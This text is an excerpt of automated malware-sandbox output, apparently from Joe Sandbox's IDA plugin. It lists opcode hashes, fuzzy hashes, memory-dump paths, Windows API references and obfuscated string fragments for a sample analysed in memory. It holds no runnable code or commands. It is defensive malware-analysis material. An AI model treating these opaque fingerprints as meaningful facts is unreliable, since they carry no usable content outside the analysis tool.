                                                                                                                                                                                                                                        • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                        • Instruction ID: 754891c4d55f5db34a85f9461a0f1e3eb3220a3c68ddaae8a40768f9bf8b14b1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 98B1E77114C3818AE325CF29C4A07BBFBD2AFD2314F188A6ED4D98B391DB748549CB12
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 024B8A1B
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 024B8A25
                                                                                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 024B8AC2
                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 024B8AD7
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 024B8BD9
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4063528623-0
                                                                                                                                                                                                                                        • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                        • Instruction ID: 54a5fac1633ffd5c1d281e60bee0341c1d5af9d1a019c1854c930726c95c202b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B418E77F4431807D71CAE75CC993AAB69B9BC4314F09803F6D86AB390DE785C0556D0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: )*$X9{;$r1B
                                                                                                                                                                                                                                        • API String ID: 0-1001561910
                                                                                                                                                                                                                                        • Opcode ID: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
                                                                                                                                                                                                                                        • Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: -$C\$Iz$[^$de
                                                                                                                                                                                                                                        • API String ID: 0-3020956940
                                                                                                                                                                                                                                        • Opcode ID: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                        • Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: &'$0c=e$2g1i$<k;m$wy
                                                                                                                                                                                                                                        • API String ID: 0-3335612808
                                                                                                                                                                                                                                        • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                        • Instruction ID: ac04301b040ad830d518737573119979119cbdc364c38c46fa818bd493266cac
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DD1F7B56183018BD724DF25C86176BB7F2EF92318F18996DE4828F3A4F7799401CB52
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                        • API String ID: 0-923305466
                                                                                                                                                                                                                                        • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                        • Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                        • API String ID: 0-923305466
                                                                                                                                                                                                                                        • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                        • Instruction ID: a6c185917b69e46fb06282357ae7e20d9b847d5aa52d65766d9f9a83b35f9a8f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2EA1E97110C3818BE365CF29C4A07ABFBD2AFD2304F188A6ED4D987391DB748449CB56
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                        • API String ID: 0-923305466
                                                                                                                                                                                                                                        • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                        • Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                        • API String ID: 0-923305466
                                                                                                                                                                                                                                        • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                        • Instruction ID: 39cbd36af6a7907b6f7c866ed88b8d9ced97755afc36f088f25f122d1b81590b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDA1F97010C3818BE365CF29C4A07ABBBD2AFD2304F188A6ED4D987391DB748549CB56
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                        • API String ID: 0-923305466
                                                                                                                                                                                                                                        • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                        • Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                        • API String ID: 0-923305466
                                                                                                                                                                                                                                        • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                        • Instruction ID: ff535f6e4ce891a8b06b0e6459c303ff4aa5d57d5fde2420a8cc2cefbb719318
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4A1D77110C3818EE325CF29C8A07ABFBD2AFD2304F188A5ED5D98B391DB748449CB56
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: in~x$kmbj$ydij$Z\
                                                                                                                                                                                                                                        • API String ID: 0-979945983
                                                                                                                                                                                                                                        • Opcode ID: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
                                                                                                                                                                                                                                        • Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                        • API String ID: 0-3432275560
                                                                                                                                                                                                                                        • Opcode ID: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                        • Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                        • API String ID: 0-3432275560
                                                                                                                                                                                                                                        • Opcode ID: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                        • Instruction ID: a21df0bb7dde899aac5f43d2cdf36963e08164e5bf08806c44d95ed54de2195d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F942267460C3908FD725DF28C85076FBBE1AF86214F18866EE8E55B392D736C506CB52
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                        • API String ID: 0-261129489
                                                                                                                                                                                                                                        • Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                        • Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                        • API String ID: 0-261129489
                                                                                                                                                                                                                                        • Opcode ID: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                        • Instruction ID: 998f19369acd3ae4a442994399b2e2b35ada2bcd3e4ab811fc1cd2af1c1622cd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7BE1E77111D3C18BE765CF29C4617BBBBD6EF92208F19896ED0D987392DB39810AC712
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                        • API String ID: 0-261129489
                                                                                                                                                                                                                                        • Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                        • Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                        • API String ID: 0-261129489
                                                                                                                                                                                                                                        • Opcode ID: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                        • Instruction ID: 6351070054c0246e6e1fa122a725108731f4a337ff947edd5ecb95023134e875
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0BE1B37151D3C18AE7758F25C4607BBBBD6EFD2208F1988AED1C987292DB39414ACB12
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: "w+y$?TUV$D@YO$^QRW
                                                                                                                                                                                                                                        • API String ID: 0-2418547040
                                                                                                                                                                                                                                        • Opcode ID: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                        • Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: MetricsSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                        • Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                        • Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                        • API String ID: 0-483502859
                                                                                                                                                                                                                                        • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                        • Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                        • API String ID: 0-483502859
                                                                                                                                                                                                                                        • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                        • Instruction ID: 07d8a16166267ddaf1c50f5ac9908c9aa89be903bcdfd70f65042fdce521e89e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2A1B2B56017818FD719CF29C590A62BBF2FF96304B1995AEC4D68F766D734E802CB20
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 67$V3R5$dB
                                                                                                                                                                                                                                        • API String ID: 0-2543814982
                                                                                                                                                                                                                                        • Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                        • Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
